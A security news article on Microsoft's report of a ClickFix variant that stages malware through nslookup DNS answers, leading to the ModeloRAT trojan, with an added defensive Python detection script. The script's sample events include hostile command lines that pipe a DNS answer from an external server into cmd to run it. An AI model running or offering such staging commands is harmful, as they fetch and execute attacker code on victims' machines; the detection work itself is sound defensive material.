Microsoft Warns Hackers Are Using Nslookup DNS Lookups to Deliver ClickFix Malware
A new twist on the ClickFix social engineering trend shows attackers abusing DNS lookups to quietly deliver malware, without traditional downloads.

Microsoft has revealed a new evolution of the ClickFix social engineering tactic: a DNS-based ClickFix variant that replaces traditional web-based malware delivery with something far harder to spot, Domain Name System (DNS) lookups.
In this newly observed variant, attackers trick victims into running a command through the Windows Run dialog that uses nslookup, a legitimate Windows networking tool, to retrieve a hidden second-stage payload.
The approach allows cybercriminals to stage malware through DNS traffic, blending malicious activity into what most systems treat as normal internet behavior.
This development highlights how attackers are increasingly relying on human trust and procedural deception, rather than exploiting technical vulnerabilities.
What Is ClickFix and Why Is It Spreading So Fast?
ClickFix has become one of the most effective social engineering techniques of the last two years. Instead of breaking into systems directly, attackers convince users to infect themselves.
The tactic typically begins with:
- Fake CAPTCHA verification pages
- Bogus error messages
- “Fix your PC” instructions
- Malvertising redirects or phishing links
Victims are then told to run a command in:
- Windows Run dialog
- Command Prompt
- macOS Terminal
Once executed, the command pulls down malware, often slipping past security tools because the user launches it through a legitimate, trusted process and is effectively authorizing the action.
ClickFix has also inspired multiple offshoots, including:
- FileFix
- ConsentFix
- CrashFix
- GlitchFix
- JackFix
Microsoft’s New Warning: DNS-Based Malware Staging via Nslookup
Microsoft Threat Intelligence says the latest ClickFix variant introduces a stealthier delivery mechanism. Instead of contacting a malicious website directly, the attack uses:
- A legitimate Windows executable (.exe)
- A custom nslookup command
- A hard-coded external DNS server
The output of the lookup is then filtered to extract the “Name:” line that nslookup prints for the answer, and the attacker-controlled text in that field becomes the next-stage payload. In simple terms:
The malware is hidden inside DNS lookups, not downloads.
Microsoft described DNS here as a “lightweight staging or signaling channel,” allowing attackers to validate victims before execution, avoid traditional web traffic detection and blend into everyday network behavior.
This marks a significant shift in how malware loaders are being deployed.
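The staging pattern described above has a recognisable shape in process-creation telemetry: nslookup invoked with an explicit resolver that is not the corporate DNS server, its output filtered for the Name: field, and that filtered text fed into a command interpreter. The following Python script, added here as an illustration and not code from Microsoft's report, scores constructed sample command lines against those traits. The event field names (`cmdline`, `parent`), the sample commands, the address blocks treated as internal and the score weights are all assumptions of this example; map them onto your own EDR or Sysmon schema.

```python
"""Heuristic detection of nslookup-based ClickFix staging in process telemetry.

Added example, not from Microsoft's report. Field names, sample events and
score weights are constructed assumptions for illustration.
"""
import ipaddress
import re
from typing import Optional

# Address blocks treated as "internal" for the resolver check (assumption).
# Anything else counts as an external DNS server, which is what the variant hard-codes.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]

NSLOOKUP_RE = re.compile(r"(?i)\bnslookup(?:\.exe)?\b")
# findstr used to pick out the "Name:" line of the nslookup answer.
NAME_FILTER_RE = re.compile(r"(?i)\bfindstr\b[^|]*\bname\b")
# The filtered text being handed to an interpreter, by pipe or by a for /f loop.
EXEC_SINK_RE = re.compile(r"(?i)\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b|\bfor\s+/f\b")


def explicit_resolver(cmdline: str) -> Optional[str]:
    """Return the DNS server passed to nslookup, if any.

    Non-interactive syntax is `nslookup [-opt ...] host [server]`, so the second
    positional token after the options is the resolver.
    """
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return None
    segment = cmdline[m.end():].split("|", 1)[0]
    # Drop cmd's caret escapes and stray quotes before tokenising.
    tokens = [t.strip("\"'") for t in segment.replace("^", "").split()]
    positional = [t for t in tokens if t and not t.startswith("-")]
    return positional[1] if len(positional) >= 2 else None


def is_internal(addr: str) -> bool:
    """True for RFC 1918, loopback and link-local literals; hostnames count as external."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def analyze(event: dict) -> dict:
    """Score one process-creation event and return the reasons behind the score."""
    cmd = event.get("cmdline", "")
    reasons, score = [], 0
    if not NSLOOKUP_RE.search(cmd):
        return {"score": 0, "reasons": [], "suspicious": False}
    resolver = explicit_resolver(cmd)
    if resolver:
        if is_internal(resolver):
            score += 1
            reasons.append(f"explicit internal resolver {resolver}")
        else:
            score += 2
            reasons.append(f"hard-coded external resolver {resolver}")
    if NAME_FILTER_RE.search(cmd):
        score += 2
        reasons.append("output filtered for the Name: field")
    if EXEC_SINK_RE.search(cmd):
        score += 3
        reasons.append("DNS answer fed to a command interpreter")
    if event.get("parent", "").lower().endswith("explorer.exe"):
        score += 1
        reasons.append("launched from explorer.exe (Run dialog)")
    return {"score": score, "reasons": reasons, "suspicious": score >= 5}


# Constructed sample events (illustrative, not captured from a real incident).
SAMPLE_EVENTS = [
    {"id": "clickfix-pipe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'cmd /c "nslookup -type=txt stage.example.test 203.0.113.7 | findstr /i Name: | cmd"'},
    {"id": "clickfix-forloop", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd /c for /f \"tokens=2*\" %a in ('nslookup stage.example.test 203.0.113.7 ^| findstr Name') do %b"},
    {"id": "user-lookup", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "nslookup www.example.com"},
    {"id": "admin-lookup", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "nslookup -type=mx example.com 10.0.0.53"},
]


def triage(events=SAMPLE_EVENTS) -> dict:
    """Analyse every event and key the results by event id."""
    return {e["id"]: analyze(e) for e in events}


if __name__ == "__main__":
    for eid, result in triage().items():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{eid:16} score={result['score']} {flag}: {'; '.join(result['reasons'])}")
```

The score is a starting point, not a verdict: tune the weights against your own baseline, since administrators do run nslookup against specific servers. The strongest single signal is the DNS answer being piped into an interpreter, which has no routine use. At the network layer the same technique shows up as UDP/TCP 53 traffic from an endpoint straight to an external address instead of the configured resolver, so restricting outbound port 53 to the corporate resolvers removes the staging channel rather than just flagging it.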
Attack Chain: From DNS Lookup to Remote Access Trojan
Once the second-stage payload is triggered, the infection expands quickly. Microsoft says the chain eventually leads to the download of a ZIP archive from an external domain: azwsappdev[.]com
Inside the archive:
- A malicious Python script is extracted
- Reconnaissance and discovery commands run
- A VBScript launcher is dropped
- The malware installs ModeloRAT, a Python-based remote access trojan
ModeloRAT enables attackers to:
- Spy on infected systems
- Steal data
- Execute remote commands
- Maintain persistent access
How Persistence Is Achieved
To ensure the malware survives reboots, the attackers create a Windows shortcut (.lnk) file in the user's Startup folder that points directly to the VBScript launcher. Every time the user logs on, the launcher runs again without any further interaction.
Bitdefender Links ClickFix Surge to Lumma Stealer Campaigns
Microsoft’s disclosure comes alongside a major warning from Bitdefender, which reports a spike in Lumma Stealer activity. These campaigns use ClickFix-style fake CAPTCHA pages to deploy CastleLoader, an AutoIt-based malware loader.
CastleLoader is particularly dangerous because it checks for:
- Virtual machines
- Security software
- Sandbox environments
Only then does it decrypt and launch the stealer malware directly in memory. Attackers are also using bait such as cracked software downloads, pirated movie sites, fake MP4 executables and rogue NSIS installers. Even after law enforcement disruption efforts in 2025, Lumma Stealer operations have continued by rapidly shifting infrastructure.
The Bigger Picture: Trust Is the New Attack Surface
Security researchers say ClickFix works because it exploits something deeper than code: procedural trust.
The commands look like troubleshooting steps users may have seen before, making the deception feel routine rather than suspicious.
As attackers increasingly hide malware inside DNS traffic, cracked software ads, and even trusted AI-sharing platforms, the line between legitimate and malicious activity is becoming harder to draw. The next generation of cyberattacks won’t always “hack” systems; they will persuade users to open the door themselves.